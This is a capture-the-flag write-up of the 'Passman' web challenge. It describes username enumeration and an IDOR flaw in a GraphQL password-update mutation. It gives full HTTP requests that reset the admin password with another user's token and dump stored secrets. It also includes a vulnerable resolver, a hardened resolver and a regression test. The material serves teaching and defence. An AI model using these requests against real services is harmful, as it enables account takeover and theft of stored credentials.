2023 Cyber Apocalypse: Passman

Challenge Information

Attribute   Details
Event       2023 Cyber Apocalypse
Category    Web
Challenge   Passman

Summary

This challenge involves a JavaScript application with a GraphQL API backend that stores passwords. The vulnerability is an IDOR flaw in the UpdatePassword mutation that allows changing any user’s password without proper authorization checks. By exploiting this, an attacker can take over the admin account and access saved passwords including the flag.


Analysis

Vulnerability Identification:

  1. User Enumeration: Attempting to register with the username “admin” returns:

    Error: ER_DUP_ENTRY: Duplicate entry 'admin' for key 'username'

    This reveals the admin user exists.

  2. IDOR in UpdatePassword mutation: The GraphQL mutation endpoint doesn’t properly validate ownership:

    mutation($username: String!, $password: String!) {
      UpdatePassword(username: $username, password: $password) {
        message, token
      }
    }

  3. Missing Authorization Check: The mutation accepts any username but only checks if the request is authenticated (has a valid JWT), not if the JWT owner matches the target username.
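As an added illustration (not the challenge's own backend source), the following shows a resolver shaped like the flawed UpdatePassword mutation beside a hardened version that ties the target account to the authenticated JWT identity; the in-memory user table, context.user and context.db are assumptions, and the JWT is assumed to have been verified by middleware before the resolver runs.

```javascript
// Constructed sample user table; a fresh copy per call keeps demos independent.
function makeUserTable() {
  return {
    admin: { username: 'admin', password: 'S3cret-admin' },
    test:  { username: 'test',  password: 'test123' },
  };
}

// Authentication only: assumes middleware already verified the session JWT
// and placed its claims on context.user (null when no valid token was sent).
function requireAuth(context) {
  if (!context.user) throw new Error('Authentication required');
  return context.user;
}

// Vulnerable resolver: authenticated, but the target account comes straight
// from client-supplied args, so any logged-in user can reset anyone's password.
function updatePasswordVulnerable(_parent, args, context) {
  requireAuth(context);
  const target = context.db[args.username];
  if (!target) throw new Error('Unknown user');
  target.password = args.password;
  return { message: 'Password updated', token: null };
}

// Hardened resolver: the authorization check binds the target to the caller.
// The JWT identity must match the username being modified, else reject.
function updatePasswordHardened(_parent, args, context) {
  const caller = requireAuth(context);
  if (args.username !== caller.username) {
    throw new Error("Forbidden: cannot change another user's password");
  }
  context.db[caller.username].password = args.password;
  return { message: 'Password updated', token: null };
}

// Regression check: the "test" user attempts the writeup's cross-account reset
// against a resolver; returns true if admin's stored password actually changed.
function crossAccountResetSucceeds(resolver) {
  const ctx = { user: { username: 'test' }, db: makeUserTable() };
  try {
    resolver(null, { username: 'admin', password: 'newpassword123' }, ctx);
  } catch (_e) { /* rejected by the resolver */ }
  return ctx.db.admin.password === 'newpassword123';
}

console.log('vulnerable:', crossAccountResetSucceeds(updatePasswordVulnerable)); // true
console.log('hardened:', crossAccountResetSucceeds(updatePasswordHardened));     // false
```

The regression check is the kind of test a defender would keep in the suite so that the ownership check cannot silently disappear again.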


Solution

Step 1: Register a test user

Register with username "test" and password "test123"

Step 2: Obtain valid JWT

Login with test/test123 to get a valid JWT token

Step 3: Exploit IDOR to change admin password

Send GraphQL mutation to change admin’s password:

POST /graphql HTTP/1.1
Content-Type: application/json
Cookie: session=<valid_jwt_from_test_user>

{
  "query": "mutation($username: String!, $password: String!) { UpdatePassword(username: $username, password: $password) { message, token } }",
  "variables": {
    "username": "admin",
    "password": "newpassword123"
  }
}

Step 4: Login as admin

Login with admin/newpassword123

Step 5: Query saved passwords

POST /graphql HTTP/1.1
Content-Type: application/json
Cookie: session=<jwt_from_admin_login>

{
  "query": "{ getPhraseList { id, owner, type, address, username, password, note } }"
}

This returns all saved passwords including the flag stored in the admin account.


Key Takeaways

  • IDOR vulnerabilities are critical authorization flaws
  • GraphQL endpoints must validate user authorization just like REST APIs
  • Mutations should verify that the authenticated user owns the resource
  • User enumeration helps identify valid targets
  • Chaining vulnerabilities (user enumeration + IDOR) increases impact
  • GraphQL introspection can reveal the full API structure
  • Always implement proper access control on every operation